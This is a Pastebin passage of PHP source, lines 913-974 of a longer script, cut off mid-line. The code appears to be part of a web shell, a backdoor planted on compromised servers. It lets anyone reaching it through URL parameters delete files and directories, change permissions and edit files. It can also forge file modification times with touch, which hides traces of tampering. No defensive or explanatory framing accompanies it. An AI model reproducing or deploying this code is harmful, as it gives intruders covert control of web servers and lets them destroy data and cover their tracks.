  913. closedir($dh);
  914. @rmdir($path);
  915. }
  916. if(is_dir(@$_GET['f'])){
  917. deleteDir(@$_GET['f']);
  918. header("location: ?action=explorer&dir=$path");
  919. } else {
  920. @unlink(@$_GET['f']);
  921.  
  922. header("location: ?action=explorer&dir=$path");
  923. }
  924. }
  925. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="touch" && $_GET['file']!="" ){
  926. ?>
  927. <a name=\"down\"></a><br><span>Touch: </span> <form action="?action=ff&go=ttouch&dir=<?php echo htmlspecialchars($path) ?>&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']);?>#down" method="post">
  928. <input type="hidden" name="f" value="<?php echo htmlspecialchars($_GET['file']);?>" /><input type="text" name="ttouch" value="<?php echo date("Y-m-d H:i:s", @filemtime(htmlspecialchars($_GET['file']))); ?>" /><input type="submit" value="Touch" />
  929. </form>
  930. <?php
  931.  
  932.  
  933. }
  934. if(isset($_GET['go']) && isset($_POST['ttouch']) && $_GET['go']=="ttouch" && $_POST['ttouch']!="" ){
  935. echo "<a name=\"down\"></a><hr><br>";
  936. $f=$_POST['f'];
  937. $f2=$_GET['f'];
  938. $time = strtotime($_POST['ttouch']);
  939. if($time) {
  940. if(!touch($_POST['f'],$time,$time))
  941. echo 'Fail!';
  942. else
  943. echo 'Touched!';header("location: ?action=ff&go=touch&dir=$path&file=$f&f=$f2");
  944.  
  945. }
  946. }
  947. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="perm" && $_GET['file']!="" ){
  948. ?>
  949. <a name=\"down\"></a><br><span>Change Modify: </span> <form action="?action=ff&go=chmod&file=<?php echo htmlspecialchars($_GET['file']);?>&f=<?php echo htmlspecialchars($_GET['f']); ?>&dir=<?php echo htmlspecialchars($path) ?>" method="post">
  950. <input type="hidden" name="f" value="<?php echo htmlspecialchars($_GET['file']);?>" /><input type="hidden" name="f2" value="<?php echo htmlspecialchars($_GET['f']);?>" /><input type="text" name="perm" value="<?php echo substr(sprintf('%o', fileperms(htmlspecialchars($_GET['file']))),-4);?>" /><input type="submit" value="Change Prem" />
  951. </form>
  952. <?php
  953. }
  954. if(isset($_GET['go']) && isset($_POST['f']) && $_GET['go']=="chmod" && $_POST['f']!="" ){
  955. $f=$_POST['f'];
  956. $f2=$_POST['f2'];
  957.  
  958. if(!empty($_POST['perm']) ) {
  959. $perms = 0;
  960. for($i=strlen($_POST['perm'])-1;$i>=0;--$i)
  961. $perms += (int)$_POST['perm'][$i]*pow(8, (strlen($_POST['perm'])-$i-1));
  962. if(!@chmod($f, $perms))
  963. echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font>';
  964. }
  965. echo '<font color="#FFFFFF"><b>OK !</b></font>';
  966. header("location: ?action=ff&go=perm&dir=$path&file=$f&f=$f2");
  967.  
  968.  
  969. }
  970.  
  971.  
  972. if(isset($_GET['go']) && isset($_GET['file']) && $_GET['go']=="edit" && $_GET['file']!="" ){
  973. echo "<a name=\"down\"></a>";
  974. $f=htmlspecialchars($_
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!